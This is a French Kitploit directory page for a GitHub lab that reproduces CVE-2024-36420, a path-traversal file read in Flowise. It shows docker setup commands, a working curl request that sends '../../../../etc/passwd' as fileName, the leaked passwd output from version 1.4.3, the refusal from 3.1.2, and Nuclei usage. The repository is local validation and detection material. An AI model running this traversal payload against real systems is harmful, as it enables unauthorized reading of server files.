Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC_CVE-2024-36420 — Laboratoire de reproduction local et modèle Nuclei pour CVE-2024-36420, une vulnérabilité de lecture arbitraire de fichiers dans Flowise via le paramètre fileName non nettoyé. Valide le comportement vulnérable (1.4.3) et corrigé (3.1.2). | Kitploit
Outils/GitHubGitHub/fineman999/poc_cve-2024-36420
Analyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzingApprentissage et ÉducationLabs et Pratique
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

Laboratoire de reproduction local et modèle Nuclei pour CVE-2024-36420, une vulnérabilité de lecture arbitraire de fichiers dans Flowise via le paramètre fileName non nettoyé. Valide le comportement vulnérable (1.4.3) et corrigé (3.1.2).

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC_CVE-2024-36420

Laboratoire de reproduction local et brouillon de template nuclei pour CVE-2024-36420 affectant Flowise.

Résumé

CVE-2024-36420 est une lecture arbitraire de fichiers dans Flowise causée par l'utilisation non nettoyée du paramètre body fileName dans :

  • POST /api/v1/openai-assistants-file

Ce laboratoire a été utilisé pour valider :

  • comportement vulnérable sur flowiseai/flowise:1.4.3
  • comportement refusé sur la version plus récente flowiseai/flowise:3.1.2

Références

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab:
https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

Fichiers

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Test vulnérable

Démarrer Flowise 1.4.3 :

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Vérification manuelle :

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Réponse vulnérable observée :

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Contrôle de la version plus récente

Démarrer Flowise plus récent 3.1.2 :

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Vérification manuelle :

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Réponse de la version plus récente observée :

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Valider le template :

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Exécuter contre la cible vulnérable :

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportement attendu :

  • 1.4.3 : correspondance
  • 3.1.2 : pas de correspondance

Remarques

  • L'écart de version est acceptable car ce dépôt ne revendique qu'un comportement observé :
    • vulnérable sur 1.4.3
    • refusé sur 3.1.2
  • Il ne revendique pas la limite exacte de la version corrigée.
  • Aucune cible réelle n'a été utilisée.
Télécharger l’outil